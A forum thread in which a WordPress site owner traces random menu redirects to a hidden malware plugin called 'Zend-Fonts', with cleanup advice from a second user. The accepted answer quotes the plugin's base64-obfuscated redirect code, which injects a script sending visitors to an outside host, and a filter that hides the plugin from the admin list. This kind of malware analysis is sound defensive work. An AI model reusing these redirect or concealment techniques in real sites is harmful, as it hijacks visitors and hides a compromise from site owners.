
I really couldn’t find anything on this, not even somebody with the same problem:

Our WordPress page recently started giving us errors when navigating through the menu.

Sometimes – but not always – if you click one of the menu items that usually get you to one of the subpages, the called URL in the URL bar gets "deformed" to something like "https://array/?u=t11kd0b&o=zac8myd&m=1".

Which is nonsense and leads to an error, of course.

You have to go back or reload the page, and if you click again the request gets processed normally, the correct page loads and the error no longer occurs. It seems to be only randomly reproducible.

It seems the error comes back after a restart of the browser…

Any ideas on this?
Is this reproducible for you?

We tried different machines and browsers and it happens on all of them.

Any help would be greatly appreciated!

2 Answers


  1. Chosen as BEST ANSWER

Ok... I found the problem: malware. It seems to be a problem with a "hidden plugin" called Zend-Fonts which we never installed. It didn't show up in the plugin panel (unless I went through the recovery mode of the Health Check plugin).

    I took a look at the plugin .php file and found the string that appeared in our URL bar at times in this function:

    // Decoded literals: 'aHRfcnI=' is "ht_rr" (the marker cookie name), 'Lw==' is "/" (cookie path)
    if (!$_COOKIE[base64_decode('aHRfcnI=') ]) {
            // Set the marker cookie for 24 h, so each visitor is redirected only once a day
            setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );

            // The three literals decode to '<script>window.location.replace("',
            // '");window.location.href = "' and '";</script>', i.e. a client-side redirect
            // to https://<$url>/?u=t11kd0b&o=zac8myd&m=1 ($url is set elsewhere in the plugin, not in this fragment)
            echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Ijs8L3NjcmlwdD4=' );
        }
    } // closes the enclosing function, whose header was not quoted here
    

    This seems to be the code to hide the plugin (how nice to document the code properly...):

    //hide plugin
    // Filters the array WordPress builds for the Plugins screen and removes
    // the plugin's own entry, so it is active but never listed.
    add_filter('all_plugins', 'hide_plugins');
    function hide_plugins($plugins) {
        unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
        return $plugins;
    }
    

    I couldn't delete the plugin in recovery mode, however... so I removed the plugin's folder in my WordPress installation (wp-contents/plugins/zend-fonts-wp).

    Let's hope this is enough...

    Google Search did not give me much on that plugin / malware. It seems to want to redirect to some XXX site.

    Hope this helps anybody encountering the same.

    EDIT: Looking through the plugin's code I also found some entries to the WordPress SQL database.

    I deleted the databases that were referenced in the code, "wp_zen_timetable" and "wpusers_inputs".

    You can identify that those are not from WordPress since their type/engine is MyISAM (all other DBs were InnoDB), so they stick out if you sort your databases by DB type.


  2. Had this malware plugin appear on one of my sites. It predominantly is a link redirect hack. As above, we removed the plugin folder and it came back. Removed it again and changed all user passwords and activated 2FA, but there was still some database activity linked to the removed plugin. Website scans on Sucuri also showed issues still.
    The only solution we found was to remove/replace all the core WordPress and plugin files...
    My suspicion is that there was malware on a user's device which provided the password for the entry point. I suggest all users' devices are also scanned for malware!
